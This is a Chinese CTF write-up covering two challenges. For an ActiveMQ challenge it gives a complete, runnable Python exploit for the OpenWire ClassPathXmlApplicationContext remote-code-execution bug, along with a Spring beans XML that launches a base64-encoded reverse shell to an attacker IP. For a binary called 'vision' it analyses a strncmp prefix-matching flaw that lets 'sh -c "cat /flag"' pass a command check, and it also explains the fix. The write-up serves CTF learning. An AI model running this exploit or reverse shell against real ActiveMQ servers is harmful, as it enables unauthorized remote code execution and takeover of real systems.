rw体验赛wp
唉,咱好菜,就出了两个题,ghostscript那个题调了半天没调通
Be-an-ActiveMq-Hacker
搜了一下，用网上的 exp 打通了。exp 的原理：向目标 ActiveMQ 的 61616 端口发一帧构造好的报文，让 broker 去实例化 `org.springframework.context.support.ClassPathXmlApplicationContext`，构造参数是攻击者可控的 XML 地址；broker 会自己去拉取并解析这个 XML（就是下面那份 poc.xml），所以目标机必须能出网访问到你起的 HTTP 服务，反弹 shell 的监听也要提前开好。
https://blog.csdn.net/weixin_49125123/article/details/135577221
import io
import socket
import sys
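def _build_frame(classname: str, xml: str) -> bytes:
    """Serialize the single request frame that ``main`` sends.

    The layout is reproduced byte-for-byte from the original PoC: a 4-byte
    big-endian size prefix, one command-type byte (31), two int/bool pairs,
    a 2-byte-length-prefixed UTF-8 ``classname``, one more bool byte and a
    2-byte-length-prefixed UTF-8 ``xml`` string.  NOTE(review): the meaning
    of the individual fields is not shown in this file (31 is presumably the
    OpenWire command type the broker deserializes into an exception whose
    "class name"/"message" are the two strings); confirm against the
    protocol before changing any of them.

    Args:
        classname: fully-qualified Java class the target is asked to load.
        xml: URL (or path) handed to that class's constructor.

    Returns:
        The frame as ``bytes``.

    Raises:
        ValueError: if either string does not fit a 2-byte length prefix.
    """
    class_bytes = classname.encode("utf-8")
    xml_bytes = xml.encode("utf-8")
    # The length prefixes must describe the *encoded* byte count.  The
    # original used len(str), which silently diverges from the byte length
    # as soon as either string contains a non-ASCII character.
    for field in (class_bytes, xml_bytes):
        if len(field) > 0xFFFF:
            raise ValueError("string field too long for a 2-byte length prefix")
    return b"".join([
        # The original sends a constant 32 here rather than the real frame
        # length; kept as-is because that is what was observed to work.
        (32).to_bytes(4, "big"),
        bytes([31]),
        (1).to_bytes(4, "big"),
        b"\x01",
        (1).to_bytes(4, "big"),
        b"\x01",
        b"\x01",
        len(class_bytes).to_bytes(2, "big"),
        class_bytes,
        b"\x01",
        len(xml_bytes).to_bytes(2, "big"),
        xml_bytes,
    ])


def main(ip, port, xml, *, timeout=None):
    """Send one crafted frame to ``ip``:``port`` and close the connection.

    ``xml`` is the URL the *target* will fetch and parse as a Spring beans
    file, so it has to be reachable from the target host, not just from the
    attacker's machine.  Only point this at systems you are authorized to test.

    Args:
        ip: target host.
        port: target TCP port (61616 in the original usage text).
        xml: URL of the attacker-hosted beans XML.
        timeout: optional socket timeout in seconds; ``None`` (the default)
            keeps the original behaviour of blocking indefinitely.

    Raises:
        OSError: on connection or send failure (propagated from ``socket``).
        ValueError: if ``xml`` is too long for the frame's length prefix.
    """
    classname = "org.springframework.context.support.ClassPathXmlApplicationContext"
    frame = _build_frame(classname, xml)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # The context manager closes the socket on every exit path, including a
    # failed connect(); sendall replaces the makefile/flush/close sequence.
    with sock:
        if timeout is not None:
            sock.settimeout(timeout)
        sock.connect((ip, port))
        sock.sendall(frame)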
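if __name__ == "__main__":
    # CLI: poc.py <target> <port> <url-of-poc.xml>.  The URL is fetched by
    # the target itself, so it must point at an HTTP listener the target
    # can reach.  Usage errors go to stderr and use sys.exit rather than
    # the site-provided ``exit`` builtin, which is not guaranteed to exist.
    if len(sys.argv) != 4:
        print("Please specify the target and port and poc.xml: python3 poc.py 127.0.0.1 61616 "
              "http://192.168.0.101:8888/poc.xml", file=sys.stderr)
        sys.exit(1)
    try:
        port = int(sys.argv[2])
    except ValueError:
        print("port must be an integer, got %r" % sys.argv[2], file=sys.stderr)
        sys.exit(1)
    main(sys.argv[1], port, sys.argv[3])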
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<!--
  poc.xml: the beans file the Python PoC points the target at.  When the
  target parses it as a Spring application context, the bean below is
  instantiated and its init-method calls ProcessBuilder.start(), so the
  command runs inside (and with the privileges of) the JVM that parsed the
  file.  The target must be able to fetch this file over HTTP from the host
  named in the PoC's third argument.
-->
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<!--
  {echo,...}|{base64,-d}|{bash,-i} uses bash brace expansion, presumably to
  avoid literal spaces in the argument.  The base64 decodes to
  "bash -i >& /dev/tcp/192.168.146.132/2333 0>&1", a reverse shell to the
  attacker's listener; change the IP/port (and re-encode) before reuse.
-->
<value>{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzIvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}</value>
</list>
</constructor-arg>
</bean>
</beans>
vision
问题出在返回 `Not Support 4.` 的那段命令校验上，具体是 `strncmp` 的长度参数取错了：
else
{
memset(s2, 0, sizeof(s2));
v11 = strchr(a1, 32);
if ( v11 )
{
strncpy(s2, a1, v11 - a1);
}
else
{
n = strlen(a1);
strncpy(s2, a1, n);
}
v13 = strlen(s2);
if ( v13 )
{
v7 = 0;
v10 = off_4020[0];
while ( strncmp(v10, s2, v13) )
{
v10 = off_4020[++v7];
if ( !off_4020[v7] )
{
strcpy(a2, "Not Support 4. \n");
return __readfsqword(0x28u) ^ v23;
}
}
这里的逻辑是：先把输入 a1 的第一个以空格分隔的 token 拷到 s2（没有空格就整个拷），然后拿 s2 逐个和 off_4020 命令表里的条目做 strncmp，表走到 NULL 还没匹配上就返回 "Not Support 4."。关键在于 strncmp 的第三个参数 v13 = strlen(s2)，用的是输入 token 的长度而不是表中命令的长度，所以它实际上只检查"输入是不是某个合法命令的前缀"。匹配成功后会先判断是不是一些预设的命令，如果不是，整个原始输入 a1（不只是 s2）会原样传到下边 popen 那执行。
; off_4020: NULL-terminated table of allowed command names.  The validation
; loop walks it with strncmp(off_4020[i], s2, strlen(s2)), i.e. a prefix
; match on the caller's first token; "showKey" is the entry "sh" hits.
.data:0000000000004020 6B 20 00 00 00 00 00 00 off_4020 dq offset s1 ; DATA XREF: sub_1589+3E5↑o
.data:0000000000004020 ; sub_1589+410↑o
.data:0000000000004020 ; sub_1589+432↑o
.data:0000000000004020 ; "ping"
.data:0000000000004028 70 20 00 00 00 00 00 00 dq offset aUname ; "uname"
.data:0000000000004030 76 20 00 00 00 00 00 00 dq offset aPwd ; "pwd"
.data:0000000000004038 7A 20 00 00 00 00 00 00 dq offset aDate ; "date"
.data:0000000000004040 7F 20 00 00 00 00 00 00 dq offset aId ; "id"
.data:0000000000004048 82 20 00 00 00 00 00 00 dq offset aWhoami ; "whoami"
.data:0000000000004050 89 20 00 00 00 00 00 00 dq offset aPoweroff ; "poweroff"
.data:0000000000004058 92 20 00 00 00 00 00 00 dq offset aShowkey ; "showKey"
.data:0000000000004060 9A 20 00 00 00 00 00 00 dq offset aOpenthedoor ; "openthedoor"
.data:0000000000004068 00 00 00 00 00 00 00 00 align 10h ; zero qword at index 9: this is what the loop's !off_4020[v7] test hits when nothing matched
else
{
stream = popen(a1, "re");
if ( !stream )
{
perror("popen failed");
exit(1);
}
while ( fgets(s, 256, stream) )
strcat(a2, s);
pclose(stream);
}
}
命令表里有一个 showKey。传 `sh ...` 时 s2 = "sh"、v13 = 2，strncmp("showKey", "sh", 2) 只比较前两个字节，返回 0 表示相等，循环退出、校验通过；而 popen 拿到的是完整的 a1，所以 sh 后面跟什么参数都行。同理任何是表中命令前缀的 token（比如 p、u、i）都能通过校验，只是 sh 正好是一个真实存在的程序，能被 popen 起来。修复办法是改成完整匹配：用 `strcmp(v10, s2) == 0`，或者在 strncmp 之外再要求 strlen(v10) == v13，这样 "sh" 就不会再命中 "showKey" 了。
exp
sh -c "cat /flag"